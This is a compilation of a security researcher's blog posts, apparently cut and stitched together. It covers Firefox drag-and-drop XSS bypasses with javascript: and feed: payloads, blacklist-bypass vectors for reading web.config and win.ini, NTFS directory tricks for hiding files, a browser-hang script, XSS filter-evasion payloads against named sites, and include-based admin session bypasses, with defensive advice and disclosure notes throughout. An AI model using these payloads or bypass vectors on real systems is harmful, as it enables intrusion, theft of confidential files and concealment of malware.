First of all, this vulnerability and the related techniques have already been reported to Mozilla on 21st Nov 2011, without having any specific result till the date of this report (issue ID 704354 – works on all the latest versions which support HTML5). I had raised this bug as a major issue, but it seems it was not important from Mozilla Firefox point of view and its risk is not high at all.

However, NoScript can protect the users against it from version 2.2.3 [released about three weeks ago] (http://noscript.net/changelog) – thanks to Giorgio Maone for the fast response and quick fix.

As there is already a solution for this issue and its impact is not high, I am going to publish my research results as they belong to 2011!

Introduction

As you may have noticed, most of the modern browsers are recently protecting their users from running unwanted JavaScript by copying and pasting it in the address bar or even by dragging and dropping it into a web page. In this research, I have found a technique to bypass Drag/Drop protection in Mozilla Firefox to run a JavaScript. As a final result, it is possible to drag and drop a hidden JavaScript into a predefined HTML5 box and run the Javascript code. Unfortunately, if you put this page in an IFrame, the Javascript code can be run on the context of the main site that includes the IFrame. For instance, When Facebook opens any URL in a frame, it is possible to run a JavaScript code on Facebook website by drag and drop jacking.

The current protection

In order to understand the Mozilla Firefox protection against JavaScript Drag and Drop, follow these steps:

1- Go to Mozilla Firefox address bar and type “javascript:alert(1)” without pressing Enter.

2- Select all the string that you have just typed (“javascript:alert(1)” without quote signs).

3- Drag and drop it on a new tab or on the context of the same tab that you currently have. You will not receive any alert message.

First bypass method- Letter Capitalization

Now, in previous steps, capitalize one or more letters in the “javascript:” string (for instance “jAvAscript:”) and drag/drop it into the page. You should be able to see an alert message as you have bypassed the Mozilla Firefox protection!

Second bypass method- XSS by Feed Protocol

I have also found another interesting protocol in Mozilla Firefox that can lead to running a JavaScript. This protocol can be used as follows to bypass the Mozilla Firefox prevention method:

“feed:javascript:alert(1)”

“feed:feed:feed:javascript:alert(1)”

“feed:javascript:javascript:feed:alert(1)”

“feed:feed:javascript:javascript:feed:alert(1)”

” feed:feed:feed:javascript:alert(1)”

A possible exploitation method – HTML5 drag/drop functionality

In this step, I had to find a way to use the issue and exploit the system to prove that it can be an important security risk; however, there are two facts that made it a bit difficult:

1- There is no point if we cannot run the JS code on the context of another site.

2- We need the user interaction to d/d a JS code. And it is not easy to deceive the users to d/d a JavaScript code when it is visible.

The first problem has been solved by using HTML5 D/D functionality that I have found from the following URL: “http://html5demos.com/drag“; I found out, if I drag and drop the “feed:javascript:alert(1)” to the drop location, the JavaScript will run due to the redirection. And interestingly, if this drop location is inside an IFrame, the main page will be redirected and therefore we can conduct an XSS attack on the context of the main website.

The second problem was also solved by using a hidden “textarea” tag that I found during my tests! In Mozilla Firefox, if you select a text with a hidden textarea, all the texts in that hidden textarea will be selected as well.

I have created a proof of concept which can be found in the following link:

PoC: http://soroush.secproject.com/downloadable/demo/FF_DragDrop_XSSHost_simp.html

Conclusion

In this research, I was able to bypass Mozilla Firefox – Javascript Drag and Drop by using capitalization and Feed protocol. Then I was able to exploit this issue to run a JavaScript code in the context of another website which can accept an external frame by using the HTML5 drag and drop functionality.

Future Works

It is still possible to bypass Mozilla Firefox prevention method by finding another protocol or maybe by using the encoding techniques.

If someone drags and drops a JavaScript into a page with “chrome://” protocol, it can lead to a local code execution; however, this protocol is highly protected by Mozilla Firefox and I was not able to find a way to make it possible. As a PoC, drag and drop the following Javascript code into the “chrome://global/content/config.js” page to run the local Windows Calculator:

“feed:jAvAscript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(‘c:\\windows\\system32\\calc.exe’);process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);”

Unrestricted File Download V1.0 – Windows Server

I do not want to talk about Insecure Direct Object References without any protection as they are obviously exploitable; Instead, I want to talk about bypassing the protected ones! The problem that I want to explain here is how hard it is to protect a system that uses Insecure Direct Object References by using black-list technique.

Whenever penetration testers see a website which accepts a path as an input, they think about these questions:

1- Can I have access to the secret files?

2- Can I do directory traversal?

3- Can I modify another file?

4- Can I do race condition?

And so on.

The answer from programming point of view is: “it depends!”:

1- If they have no protection in-place: “Yes. Yay!”

2- If they are using black-list method: “Think about a bypass now! There should be a way and I just need to find it! Think about encodings, decoding, effective characters, behaviour of the system against special characters, and so on.”

3- If they are using white-list method: “Is there anything on the list that can be misused? Can I stick some of them together to make another character or change the behaviour of the system?”

My point is that there is often a way to bypass a black-list. However, it is not the same for white-list if you do it correctly.

Let’s Bypass a Blacklist Method

Now, I want to use a case to show an example of using black-list, and methods of bypass.

Assume we have “www.vulnerable.com/download.aspx” which accepts a file path as an input and reads it and loads it into the output. (To make it easier, “/upload” folder is on the root of the website)

For example: “/download.aspx?file=/upload/document.doc”

Now, if you try the following inputs, you will receive an “access denied” error from the page:

“/download.aspx?file=web.config”

“/download.aspx?file=download.aspx”

“/download.aspx?file=/download.aspx”

But, if you try the following inputs, you will receive a “file not found” error or a blank-page from the page:

“/download.aspx?file=test.doc”

“/download.aspx?file=/upload/../test.txt”

“/download.aspx?file=/test.f0ob4r”

According to the response of the page, obviously, it is using a black-list method.

These are the first things that I can think about (my pre-test-cases):

0- Use uppercase, lowercase, and Unicode in the extension. For ex: “/download.aspx?file=/wEB.CoNfiG” and so on.

1- As you might know, there are some characters after the filename that will be ignored by Windows. So, I should try something like “/download.aspx?file=/web.config.” or “/download.aspx?file=/web.config… ..”

2- Using short filename format of the file: “/download.aspx?file=/web~1.con”

3- Using null character: “/download.aspx?file=/web.config%00.txt”

4- Using another extension in the path: “/download.aspx?file=/test.txt/../web.config”

5- Using different space characters in the path: “/download.aspx?file=/web.config%09”, “/download.aspx?file=/web.config%0a”, “/download.aspx?file=/web.config%0b”, “/download.aspx?file=/web.config%0c”, “/download.aspx?file=/web.config%0d”, “/download.aspx?file=/web.config%20”, and so on (similar to 1).

6- Finding a character that is removed by the web application automatically before loading a file to put it in the extension and bypass the black-list protection.

7- Try alternate data stream to read the files: “/download.aspx?file=/web.config::$Data”

8- Try to use direct path and share path. Ex: “/download.aspx?file=c:\\windows\\win.ini”, “/download.aspx?file=\\?\c:\\windows\\win.ini”, or “/download.aspx?file=\\127.0.0.1\c$\WINDOWS\\win.ini”

9- Try to do directory traversal. Ex: “/download.aspx?file=../../../../../../../../../../../boot.ini”

10- Try other file-system understandable vectors. Ex: “/download.aspx?file=web.config/.”, “/download.aspx?file=web.config\.”, and so on (similar to 1).

And combination of the above solutions to create more complicated test cases!

What do you think? Please let me know if you know any other interesting test case. This is the result:

Each of the above vectors could lead to bypassing the protection. Now, I can tell you that the actual vulnerable source code of the page was:

And, we can download the confidential files with different vectors (see number 0, 5, and 10 on the table above). Now, an attacker can download the entire website and look for the credentials, hidden files and folders, and find any other vulnerability such as SQL Injection by having the source code.

Secure and Effective Solution

Now, what can we do to stop this attack? These are the general solutions:

1- Do not use direct object references when it is possible:

For indirect references, use something random, hard to guess, and meaningless such as GUIDs. You need to implement more functions and invest more time on programming and debugging. However, your achievements are:

1.1- Increasing the Security by using strong random pointers such as GUIDs

1.2- Easier asset managing and have different access controls

2- Force yourself to always use white-lists:

It is very rare that you have to only use a black-list for an input! If an input is random and unpredictable, you may need to redesign that input. Write down the input purpose(s) and do whatever you can to restrict it to a range of characters. Now, think about this range and review the characters one by one. Is there anything in the list which can cause an issue? Do you need to allow any other characters besides [a-zA-Z0-9]? Why? Think about it and follow the best security practices.

Sometimes you need to use blacklist after passing the input from a white-list to have more security. For example: an input can contain a file path. Therefore, we should allow dot “.” character. However, we should not allow any double dot “..” as it can cause directory traversal.

If you are designing a system, look for the vulnerabilities which have been reported on the similar systems in Internet. You may find something that you had not had any knowledge about it before! Do not think that you know everything! Even a semi-colon or colon can compromise your system sometimes.

Talk about your system with the security people; with experts (not script kiddies). You can ask your questions in different security forums to find a clue. Ask them to break your protection to improve the security.

Note 1: a bad implementation is worse than not having any implementation! When you don’t have any protection, at least you know you do not have anything to protect yourself and the system is unsafe!!! However, when you have an insecure/bad implementation, you think the system is safe enough but it is not, and attackers will find this out – trust me!

Note 2: If you are putting different inputs next to each other, it is better to pass them at least through a black-list protection after concatenation.

Now, without using an indirect reference, two solutions for our vulnerable example (“www.vulnerable.com/download.aspx”) can be:

Solution 1 (More White-list – more restricted):

1- Replace all the “/” with “\” character in order to make the validation easier (for Windows OS). (Black-List)

2- Replace all the dot characters before the backslash character (“.\”) with a single “\” character in order to make the validation easier. (Black-List)

3- Only accept limited characters as an input: RegEx: (([a-zA-Z0-9][\.]{1})|[a-zA-Z0-9\\])*

4- File name should start with: RegEx: ^[a-zA-Z0-9\\] (White-list)

5- File name should end with: RegEx: [a-zA-Z0-9]$ (White-list)

Then a general ReGex will be (include 3, 4, and 5): ^([a-zA-Z0-9\\]{1})(([a-zA-Z0-9][\.]{1})|[a-zA-Z0-9\\])*([a-zA-Z0-9])$ (White-list)

6- Find the file extension by using the last dot “.” character of the file. This extension should be in the list of allowed extensions such as “gif”, “jpg”, “doc”, “docx”, “pdf”, “rtf”, and so on. (White-List)

Limitation: It is not possible to use Unicode or special characters in the file or the directory name.

Solution 2 (More Black-List – less restricted):

1- Trim the input to remove unnecessary spaces (Black-List)

2- Replace all the “/” with “\” character in order to make the validation easier (for Windows OS). (Black-List)

3- Replace all the “..” with “.” character in a loop till you cannot find any “..” anymore. (Black-List)

4- Replace all the space and dot characters before and after the “\” character with a single “\” character in order to make the validation easier. (Black-List)

5- Replace all the “\\” with “\” character in order to make the validation easier. (Black-List)

6- Path should not contain these characters: RegEx: [^:*?"<>|;~] – (for Windows OS)

7- Find the file extension by using the last dot “.” character of the file. This extension should be in the list of allowed extensions such as “gif”, “jpg”, “doc”, “docx”, “pdf”, “rtf”, and so on. (White-List)

Quick Conclusion:

Stop using blacklist protections for direct object references if you cannot use indirect ones. Moreover, do not forget to talk to the specialists to implement it correctly.

Final Words

Please send me your feedbacks via my email address (irsdl at yahoo dot com) to improve this white-paper. You can use whole or part of this document by putting a reference to the author (Soroush Dalili) and link of the main document.

Currently just by using Google, a lot of vulnerable websites and Content Management Systems (CMS) can be found. If you find an issue based on the content/idea of this paper in a permitted system (such as your website CMS), please report it to its legal authority to patch the system as soon as possible; and I would be thankful if you put a link to this document as a reference in your advisory.

However, please do not use this knowledge against any website or system without having a legal permission. And, I do not accept any responsibility for any usage from this white-paper and its content/idea.

Reference(s):

- OWASP, Unrestricted File Upload: http://www.owasp.org/index.php/Unrestricted_File_Upload

—
Downlaod the PDF file: http://soroush.secproject.com/downloadable/Unrestricted_File_Download_V1.0.pdf
—
Backup link is also available: http://0me.me/files/soroush.secproject.com/Unrestricted_File_Download_V1.0.pdf

The result was a bit interesting and scary! I could find a secret place that important data can be hidden in as well as the malwares! I want to share it with you as some malware writers might already know about this. It is actually another Microsoft weird feature!

In order to create a dotty directory and monitor its behavior, follow me:
1- Open the Windows Command Line (cmd.exe).
2- Go to a test directory.
3.0- Now, insert the following commands and hit Enter:
          md ..::$index_allocation –> (Tested in Win XP)
          md …::$index_allocation
          md ….::$index_allocation
          md irsdl
          md irsdl.::$index_allocation
          md irsdl..::$index_allocation
3.1- You can use “echo test > ” instead of “MD” if you have any problem.
4- Now get a directory list from the folder that you are currently in (by using “Dir”)
5- In order to open each of these directories use “CD DirName::$Index_Allocation”.
          cd …::$index_allocation
6- You can create some files inside these directories as well.
7- Now use Windows Explorer to see these directories.

The result in Windows XP:
- The double dot (“..”) directory is hidden and you cannot see it.
- In windows explorer, directories with a single dot at the end show the files which are inside a directory with same name but without any dot. For example: “irsdl.” shows content of “irsdl”. Directories with a double dot at the end show the files which are inside a directory with the same name but with a single dot. For example: “irsdl..” shows content of “irsdl.”. And so on.
- In Windows Explorer, if you modify a directory with some dots at the end, the modification will be applied on a directory with a dot lesser than the modified directory. Therefore, if you delete “irsdl.”, “irsdl” folder will be deleted instead!
- It is not possible to delete these directories by Windows Explorer. (use “del DirName::$Index_Allocation\*.* & RD DirName::$Index_Allocation” instead)

In Windows 7:
- It is very similar to Windows XP. However, if you click on the directories by Windows Explorer, it may show you the content of a specific directory for all the Dotty ones.
- It is not also possible to create a folder with only double dots “..”.
The directories which only contain several dots such as “…”, show the content of their root directory although it is not so real!

Result:
Dotty directories are very good places to hide some files and data! It is not easy to be detected and it is not easy to be deleted! As malwares can use the same technique to hide themselves inside an NTFS partition, we should be very careful about it.

Notes:
Note 0: I might miss some other interesting points. Please let me know when you find one.
Note 1: some of these directories might be accessible by IIS.
Note 2: I experienced a crash in Windows Explorer in Win7 during playing with these directories.
Note 3: Norton Internet Security 2011 in Win 7 could find and delete the EICAR virus inside these folders. It’s not tested on the other things.
Note 4: Windows XP did checkdisk after a restart.
Note 5: You can do the same to create a file by using “echo > …::$Data”. And delete it by “del *.*”.

Download From Here: http://soroush.secproject.com/downloadable/XSUH_FF_1.pdf
Or Here: http://0me.me/demo/XSUH/XSUH_FF_1.pdf

Proof of Concept: http://0me.me/demo/XSUH/XSUH_demo_firefox_all_in_1.html

Note:  This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build5 (26th May 2010).

Therefore, we need something else as a signature to improve the scanners result. And as a solution we can use a “/” as an identifier. In case of requesting a valid directory without adding a slash at the end of it, the web-server will add an slash automatically, and in case of having an invalid directory there will not be any slash at the end of the directory name.

Some examples:

Invalid Directory: http://www.microsoft.com/foobars

Valid Directory: http://www.microsoft.com/test

——–

Invalid Directory: http://code.google.com/foobars

Valid Directory: http://code.google.com/js

——–

Invalid Directory: http://www.facebook.com/foobars

Valid Directory: http://www.facebook.com/admin

——–

Invalid Directory: http://uk.yahoo.com/foobars

Valid Directory: http://uk.yahoo.com/private

——–

Cheers,

Soroush Dalili

Some new methods of bypassing file uploaders protections have been discussed. As an example bypassing by using: trailing spaces and dots, “::$data.”, direct Null char, IIS semi-colon  bug, and so on.

Uploading files by using web applications is very common. However, there is always a high risk around this matter. In case of uploading a web-shell file which can be absolutely malicious, an attacker can get the same privilege of access as the web application to the server. In this paper, which is mostly around the Windows-based web applications, some general solutions for protecting against this type of attack have been suggested. Moreover, as a proof of concept, some of the most general protection methods and the way of bypassing them have been discussed.

This article is an educational article to improve the security of the web applications. And, the author of this article (“Soroush Dalili”) does not accept and has no responsibility about the content or usage of this article in any other way. Any other usage of this article except the legal ones is completely prohibited.

Please respect the copyright and mention the name of the author (“Soroush Dalili”) in case of using this article.

Download this article by clicking here. (http://soroush.secproject.com/downloadable/Improve File Uploaders’ Protections.pdf)

<script>
function recursiveFunc(){setInterval(“recursiveFunc()”,1);}
recursiveFunc();
</script>

Just save it as an HTML file, and try to open it with your browsers. You can convert “1” to “0” to get better result in Mozilla Firefox and Chrome.
I reported it to Mozilla Firefox as a bug.
Good luck.

Google will (or already) know the users’ information!

News:

“Google pushes security with Public DNS” -> So, Google DNS can collect all the websites which is viewed by the users …

“Browsers use Google to detect web forgery -> So, a browser send a request to Google before openning a website for you! …

“The best search engine for all” -> So, Google can collect your keywords! …

“The best public mail service” -> So, Google can collect your emails …

“Google owned Youtube” -> So, Google can collect your videos …

“Google codes” -> So, Google can collect your source codes …

“Google documents” -> So, Google can collect your documents …

“Google photos” -> So, Google can collect your photos …

“Google messenger” -> So, Google can collect the messages …

“Most of the websites use Google web analyzer (tracker)” -> So, Google can track the websites’ information and also their customers! …

“Google Wave” -> So, Google can collect the blogs ,e-mails, instant messaging, FTPs, social networking’s, and so on’s information! …

“Google powerful translators” -> So, Google can understand why you are saying in other languages!

“Searchable images/sounds/videos by text or another object!” -> So, Google can search in users’ collected data …

“Chrome OS” -> So, Google can do anything with your computer …

AND etc (see http://www.google.co.uk/intl/en/options/ and http://www.googlelabs.com/)…

We are waiting for the most powerful shopping centre by Google!

However, we should trust Google in order to have happier and easier life!

Google = No Pain, No Gain!

Best wishes ;)

Soroush

I reported these two vulns. to its website just for having more security. And, I think these two vulnerabilities are fixed now.

However, I believe that still 70% of webistes are vulnerable against the OWASP TOP 10!

Also, I think you should read “Survey: Majority of Web sites vulnerable” as well.

Cheers,

Soroush

]]> http://soroush.secproject.com/blog/2009/11/my-belief-70-of-websites-are-vulnerable/feed/ 0 http://soroush.secproject.com/blog/2009/11/how-to-stop-hardware-key-loggers/ http://soroush.secproject.com/blog/2009/11/how-to-stop-hardware-key-loggers/#comments Sun, 29 Nov 2009 14:33:22 +0000 Soroush Dalili http://soroush.secproject.com/blog/?p=171 Nowadays new generations of hardware key-loggers are emerged, and unfortunately attackers are using them intensively to steal the keystrokes of users. These key-loggers are OS independent and are in different shapes. They are even capable of stealing the BIOS password. Most of them look like a convertor for PS/2 and/or USB to PS/2 and/or USB (Fig. 1). Besides, some of them are chipsets which are embedded in the keyboard itself (Fig. 2). And others use electromagnetic features to steal the keystrokes which are put around the wire of the keyboard or work remotely by capturing the frequency spectrum of the keyboard communication[1]. The problem is that these hardware key-loggers have become very cheap and simply available[2]. Moreover, there are some free articles about how to make their circuits[3].

So, how can we stop it if we could not remove its hardware from our computer or there is a danger of electromagnetic key-logger?

The first and the simplest idea is using an on-screen keyboard and click on it by using a mouse. However in order to get the best result, this on-screen keyboard should be dynamic in order to prevent a hardware key-logger for the mouse itself, which captures the mouse movements and its clicks. Another way is using encryption between the keyboard and its driver. For instance, there is no doubt that by using TPM and having strong encryption methods between keyboard and motherboard (or OS itself), the keyboard can encrypt the keystrokes before sending them to the computer. But, I want to be more initiative. Another idea can be using an optical-dynamic keyboard device which shows a keyboard on your desk or on your palm, and you can touch it in order to press a key (Fig. 3). There is also an application which claims that it can detect a hardware key-logger, but I have not tried it yet and I think it is still possible to hide a hardware key-logger completely from the OS.

Figure 3.

This text is completely based on my own idea, so please respect the copyright.

[2] http://www.google.co.uk/products?q=hardware+keylogger

[3] http://derek.chezmarcotte.ca/?page_id=24

I hope you enjoy :)

Click here to download this mini-article!

Cheers,

Soroush

Click here to download the PDF file.

This article is ready to download from these links:

http://soroush.secproject.com/downloadable/ASP_Security_Soroush_Dalili.pdf

or

http://rapidshare.com/files/273684865/ASP_Security_Soroush_Dalili.zip

Cheers

Soroush

BugReport.ir (before soroush.secproject.com website)

And

Soroush.SecProject.Com (nowadays)

Now, because of using some tricks in these XSSes, they can be interesting. I want to describe some of these tricks here:

1- Insert JavaScript code inside of available script. In order to insert proper arbitrary JavaScript, we must insert something to close left side of JavaScript, then insert our own JavaScript, and finally close the right side of JavaScript to prevent errors.

As you can see in “http://www.xssed.com/mirror/39834/”, the XSS query is this:

?sx=”});};document.write(‘This is XSS test – BugReport.ir’);alert(‘Safe XSS BugReport.ir’);function startVideoPlayer(){getFailQS({destURL:”",show:”

In this query, first I closed the defined function by ["});};] , and then I inserted my arbitrary script there. After that, I used [function startVideoPlayer(){getFailQS({destURL:"",show:"]  to open a function to complete the right side of the code to prevent a JavaScript error.

You can see some other example of this group:

http://www.xssed.com/mirror/41138/

http://www.xssed.com/mirror/41800/

http://www.xssed.com/mirror/55622/

2- Insert JavaScript code in another format. Sometimes we can insert our JavaScript code via the some other forms of input such as Base64. In this way, we must look for algorithms of inputs.

As you can see in “http://www.xssed.com/mirror/55624/”, I inserted a Base64 string in order to perform XSS attack.

3- Using http://ha.ckers.org/xss.html techniques. There are always something new and fantastic in this XSS cheat sheet! I learned many things from it.

Example to bypass filters: “http://www.xssed.com/mirror/56197/”

4- Use your own idea to insert your codes. We must be creative in performing XSS. For example in “http://www.xssed.com/mirror/56651/”, I could not insert any string for my alert() function, so I insert something in title of the page, and then read them in my alert() function. It is obvious that I could use eval() function to execute some codes by this method.

?wrd=Tested in Mozilla (Onmouseover) — IRSDL is HERE — Soroush.SecProject.Com — Another XSS Trick in Yahoo&prn=[irsdl]&pth=test&opt=onmouseover%3dalert(window.document.title.substring(15)) onmouseout%3dalert(/SeeYou/)

Another example is “http://www.xssed.com/mirror/40384/” which is based on the “http://www.bugreport.ir/index_38.htm”:

[DNN URL] /Default.aspx/”onmouseover=”x=’al’;x=x+’ert(/WWW.BugReport.IR/)’;eval(x);alert().aspx

In this XSS, I used a feature of .Net which is “Slash after .aspx” in order to change PATH_INFO parameter in Server Variable. As “Dot Net Nuke (DNN)” used PATH_INFO instead of URL parameter, path was inserted into the default.aspx page without any checking. So I inserted “onmouseover” event there. But, there was a problem with alert() function which DNN could recognize it and omit it plus all of the string after it! So, I inserted alert() function as a string into the “x” variable, and then evaluate it by using eval() function. Another problem was that DNN needed “.aspx” at the end of the request (before Get parameters)! So, I inserted an “alert().aspx” at the end of the query which I knew that DNN will omit it plus all the string after that.

Moreover, you can see in “http://www.bugreport.ir/index_38.htm” that I used another query which is:

http://[DNN URL]/Default.aspx/bugreport/”onmouseover=”var a=’.aspx?’;document.location=’http://www.bugreport.ir/?archive’;

In this example, I must use a “:” for the “http://www.bugreport.ir/?archive”, but I could not insert it before the “?” because of getting error by the IIS (“:” is used to indicate a port). So, I inserted a “.aspx?” in a temp “a” variable in order to have: 1- a “.aspx” at the end of the query (before Get parameters) 2- insert “:” into the “http://”.

Note: I could not use “onmoueover” after the “?” because it replaced the double quotation in Get parameter by %22.

Good Luck.

I think anonymization with HTTP protocol is easier than the others when you are using TOR or some anonymous VPNs.
So, I think:
1- The free web hosting must have some process to identify their users correctly!
2- Browsers must have some features to make free web hosting websites in max of security protection, and also, they must show some security warning about these websites.
3- Firewalls and Antivirus must have some protection against these free websites.

Do you have any idea?

So, if I execute Index.asp, I will execute all 3 other files which I mentioned too.

Question: What will happen if I point to the Main.asp or Header.asp directly without using the Index.asp?
Answer: If Main.asp or Header.asp does not include Check.asp, attacker can see the admin page without having the administrator credential!
Result: I see a lot of web application which had this problem!

Now assume that Check.asp is something like this:
———– Begin Check.asp ———–
some lines of codes blah blah blah
<%
‘ Get an input from the user
1 Input_CurrentFolder = Request(“currentFolder”)

2 ‘ in order to get the root directory we must set an admin session
3 session(“admin”)=true

4 directory = GetDirectory(Input_CurrentFolder)

‘Terminate admin session for the security!
5 session(“admin”)=false

%>
some lines of codes blah blah blah
———– End Check.asp ———–

I want to speak about the session. What do you think about these codes? Is there any security problem?

Question1: How can a user keep session(“admin”)=true for him/herself?
Answer1: In order to do that, user needs to stop execution on line 4!
Question2: Now, how can a user stop execution on line 4?
Answer2: User must stop running the program on line 4. So, he/she must create an error on that line! So, actually it depends on some factors. And, I want to show you 2 of them which the first one is related to subject of this article.

1- First situation: Check.asp does not contain “GetDirectory” function and this function is in Header.asp. Now if attacker point directly to the Check.asp, he/she can get the admin session! Because the program will be crashed on line 4!
2- Another situation: the “GetDirectory” function must not work with each “Input_CurrentFolder”. In other words, “GetDirectory” function must crash because of some value of “Input_CurrentFolder”.
Note: we must not have something like “On error resume next” which force the program to continue.
Result: I think this vulnerability is not a strange one; However, it is not very common. I had seen this vulnerability in some programs such as the old version of “hosting controller”!
———– End Example1 ———–
———– Begin Example2 ———–
Example2. (PHP, ?)
This is not new example but it is related to this subject.
Assume that we have:
1. SessionControl.php ->(Secured) which control the user’s session
2. EditContent.php -> by using this file, administrator can edit the website’s pages
3. AdminContent.php -> (Secured) which includes SessionControl.php and EditContent.php.

And assume that EditContent.php is something like this:
———– Begin EditContent.php ———–
<?
if (!isset($_SESSION['Level'])) exit();
if ($_SESSION['Level']==’admin’)
{
some lines of codes only for admin blah blah blah
}
?>
———– End EditContent.php ———–

You can easily see that EditContent.php is insecure because there is not any session_start() in it and everyone can set $_SESSION['Level']. Just like this: http://[something]/EditContent.php?_SESSION[Level]=admin
Note: php global variables must be on.
———– End Example2 ———–

So, you saw that the catastrophic vulnerability can easily create by the bad usage of “include” techniques.

<Files ~ “(php\.ini|\.htaccess|\.php.?|\.pl|\.cgi|\.spc|\.jsp|\.cfm|\.passwd)$”>
order deny,allow
deny from all
</Files>

But I think, this code is not secure at all. I bypass it by uploading a file with this name: “testpage.PhP”. (I tested it on my web hosting)

The problem is:

This code has a case sensitive regular expression.

Note: <FilesMatch> is similar to <Files> with this problem

One solution: use this code instead of that code:

# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Useful links:

http://www.askapache.com/htaccess/using-filesmatch-and-files-in-htaccess.html

http://blog.differentpixel.com/archives/198-Lots-of-.htaccess-tips,-tricks-and-hacks.html

http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/

Cheers